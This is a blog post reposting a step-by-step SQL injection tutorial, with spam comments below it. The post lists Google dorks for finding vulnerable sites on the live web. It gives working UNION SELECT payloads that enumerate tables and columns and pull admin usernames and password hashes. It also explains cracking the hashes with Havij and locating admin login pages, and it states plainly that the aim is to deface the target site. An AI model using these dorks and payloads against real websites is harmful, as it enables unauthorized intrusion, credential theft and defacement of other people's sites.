SQL Injection -Basics

Posted on Friday, November 11, 2011 by Tenderfoot

I found this article @ Source 
I thought this is MUST read article for aspirants who are looking for Sql Injection basics   
Credit goes to author :-Source 


< Disclaimer:-  This tutorial is purely for educational purpose>
What is SQL Injection?
Spoiler
is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.



Step 1: Choose Your Target
Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.


So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.


Dorks
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=
inurl:customer_testimonials.php?testimonial_id=
inurl:.php?rsnType=1&id=
inurl:support.php?id=
inurl:gallery_view.php?id=
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.






After you have Googled the dorks, click on any site.


To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:


Code:
http://www.sitename.com/main.php?id=232'


If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.
Step 2: Find the Vulnerable Column


Now that we found our vulnerable site, we will need to find the vulnerable columns.


Add this to the end of the URL:


Code:
http://www.sitename.com/main.php?id=232 order by 1--


Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:


Code:
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)


The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.


Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--


Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.


Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.
Step 3: Obtain Version Number and Database Name


That vulnerable column is the ONLY column that we will be editing.


Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--


If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.


Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--


And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.
Step 4: Obtain Table Names


We are almost done, don't give up just yet.


Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.


Edit the code as follows:


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--


Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..


The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--


This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.


When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.


For this tutorial, we will be using the table name of "admin".
Step 5: View the Columns, and Find the Fucking Crucial Shit


Here comes the fun part :3


To find the column names, add this to the end of the URL:


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--


Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where is says "Say Hello to My Little Friend".


In my case, this is the string that I got after I inputted "admin" to the input space:


Code:
61646d696e


Now, replace the table name with hex as so:


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--


Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.


Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:


Code:
Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..


Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):


Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--


The "0x3a" will put a colon to where the information will be separated. You should get something like this:


Code:
1:MyName:e10adc3949ba59abbe56e057f20f883e


The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here.


Now as you can see. This is the login info:


Code:
Username: MyName
Pass: 123456


Now all you have to do is find the admin page, which is usually
Code:
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will find you the admin page.
You Can use Havij To find admin page of the site

Labels: , ,

18 Response to "SQL Injection -Basics"

.
Arizona Infotech The Best Ethical Hacking Institute Says....
4 December 2012 at 04:44

Very good tricks and way of SQL injection and its Implementation, thanks to published this post

.
Anonymous Says....
16 November 2013 at 13:13

My coder is trying to convince me to move to .net from PHP.
I have always disliked the idea because of the expenses.

But he's tryiong none the less. I've been using Movable-type
on a variety of websites for about a year and am anxious about
switching to another platform. I have heard fantastic things
about blogengine.net. Is there a way I can transfer all my wordpress content into it?
Any help would be really appreciated!

Here is my weblog; serrurier a paris

.
Ajish Says....
25 June 2019 at 22:30

Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.
Data science training in Electronic City

.
sri Says....
5 August 2021 at 03:59

Thanks for sharing this informative content.,
Leanpitch provides online training in Agile team facilitation during this lockdown period everyone can use it wisely.

Agile team facilitation

.
data science Says....
27 September 2021 at 02:48



Great to become visiting your weblog once more, it has been a very long time for me. Pleasantly this article i've been sat tight for such a long time. I will require this post to add up to my task in the school, and it has identical subject along with your review. Much appreciated, great offer. data science course in nagpur

.
360DigiTMG Says....
14 March 2022 at 00:07

I want you to thank for your time of this wonderful read!!! I definately enjoy every little bit of it and I have you bookmarked to check out new stuff of your blog a must read blog!
business analytics course in hyderabad

.
traininginstitute Says....
29 April 2022 at 00:59


Really nice and interesting post. I was looking for this kind of information and enjoyed reading this one.
full stack web development course malaysia

Leave A Reply

Subscribe to: Post Comments (Atom)